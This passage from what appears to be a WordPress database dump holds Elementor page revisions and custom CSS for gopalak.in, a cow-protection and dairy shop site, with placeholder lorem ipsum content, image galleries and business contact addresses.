alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=XHOmBV4js_Ehttps://www.youtube.com/watch?v=XHOmBV4js_E		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Add Your Heading Text Here</h1>		\n		<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</strong></h4>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 16:41:24','2022-10-10 11:11:24','',1373,'https://gopalak.in/?p=1550',0,'revision','',0),(1552,1,'2022-10-10 16:49:33','2022-10-10 11:19:33','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=XHOmBV4js_Ehttps://www.youtube.com/watch?v=XHOmBV4js_E		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Add Your Heading Text Here</h1>		\n		<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</strong></h4>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 16:49:33','2022-10-10 11:19:33','',1373,'https://gopalak.in/?p=1552',0,'revision','',0),(1553,1,'2022-10-10 16:49:33','2022-10-10 11:19:33','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=XHOmBV4js_Ehttps://www.youtube.com/watch?v=XHOmBV4js_E		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Add Your Heading Text Here</h1>		\n		<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</strong></h4>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 16:49:33','2022-10-10 11:19:33','',1373,'https://gopalak.in/?p=1553',0,'revision','',0),(1554,1,'2022-10-10 16:49:34','2022-10-10 11:19:34','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=XHOmBV4js_Ehttps://www.youtube.com/watch?v=XHOmBV4js_E		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 16:49:34','2022-10-10 11:19:34','',1373,'https://gopalak.in/?p=1554',0,'revision','',0),(1556,1,'2022-10-10 17:00:55','2022-10-10 11:30:55','.site-content {background-color: #96ff00;}\n.site-inner {\n	background-color: #FFFE71;\n}\n#page {\n	background-color: #c7f6b6;\n}\n#site-header {	\n	background:#c7f6b6;\n}\nheader {\n    background: #fff;\n}\n\n.below-header-bar {\n    height: 62px;\n}\n\n.top-header {\n    border-bottom: solid;\n    border-bottom-width: 0px;\n}\n\n.top-header, .main-header, .below-header {\n    position: relative;\n}\n\n.top-header:before {\n    content: \"\";\n    position: absolute;\n    top: 0;\n    left: 0;\n    width: 100%;\n    height: 100%;\n    background: #c7f6b6;\n}\n\n.top-header .top-header-bar {\n    line-height: 45px;\n}\n\n/*below header special css*/\n.below-header-col1 {\n    float: left;\n    width: 21%;\n}\n\n.below-header-col3 {\n    float: left;\n    width: 22%;\n}\n\n.below-header-col2 {\n    width: 57%;\n    float: left;\n    text-align: center;\n}\n\n.main-header:before, .below-header:before {\n    content: \"\";\n    position: absolute;\n    top: 0;\n    left: 0;\n    width: 100%;\n    height: 100%;\n    background: #c7f6b6;\n}\n//#96ff00\n//#FFDF00','open-shop','','inherit','closed','closed','','1172-revision-v1','','','2022-10-10 17:00:55','2022-10-10 